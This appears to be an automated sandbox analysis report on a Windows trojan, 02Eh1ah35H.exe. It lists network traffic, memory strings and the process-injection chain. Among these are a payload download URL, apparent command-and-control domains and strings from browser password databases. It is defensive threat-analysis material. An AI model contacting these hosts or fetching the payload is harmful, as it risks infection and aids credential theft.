          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 03:00:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:01:55 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:01:58 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:02:01 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:02:04 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:02:09 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:02:12 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:02:15 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:02:18 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "67811756-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: 02Eh1ah35H.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.Jcsa.info
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQh
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8k8y
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Career_Counseling.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Community_College_Search.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0JHs
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Language_Learning.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/display.cfm
          Source: waitfor.exe, 00000004.00000002.33483552747.000000000637E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBY
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/
          Source: 02Eh1ah35H.exe, 00000002.00000002.28573159007.00000000326D0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.bin
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binG
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binRB
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/BJuAryIbeCLh111.binvB
          Source: 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://babalharra.com.au/ic
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/%
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/5
          Source: waitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/;
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/=
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/?==)
          Source: waitfor.exe, 00000004.00000002.33481940541.0000000004E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/E9C:
          Source: waitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/J
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/U
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/V
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://claimstakes.online/X
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
          Source: waitfor.exe, 00000004.00000002.33483552747.000000000605A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://down-sz.trafficmanager.net/?hh=
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
          Source: FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: FxK39HI69.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
          Source: waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
          Source: waitfor.exe, 00000004.00000003.28781638985.0000000008230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info
          Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknown | HTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49757 version: TLS 1.2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe | Code function: 0_2_00405595 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405595

          E-Banking Fraud

          Source: Yara match | File source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe | Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
          Source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewaitfor.exej% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033283000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000002.28574257270.00000000335D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000003.28457645000.00000000330CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@27/16
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404835
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_004021A2 CoCreateInstance, 0_2_004021A2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Local\Temp\nsgF4BC.tmp
          Source: 02Eh1ah35H.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082C5000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: waitfor.exe, 00000004.00000002.33485556560.000000000831D000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.000000000344A000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
          Source: 02Eh1ah35H.exe ReversingLabs: Detection: 50%
          Source: 02Eh1ah35H.exe Virustotal: Detection: 69%
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File read: C:\Users\user\Desktop\02Eh1ah35H.exe
          Source: unknown Process created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Process created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
          Source: C:\Windows\SysWOW64\waitfor.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: oleacc.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: msi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: powrprof.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wkscli.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: umpdc.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: msi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wininet.dll
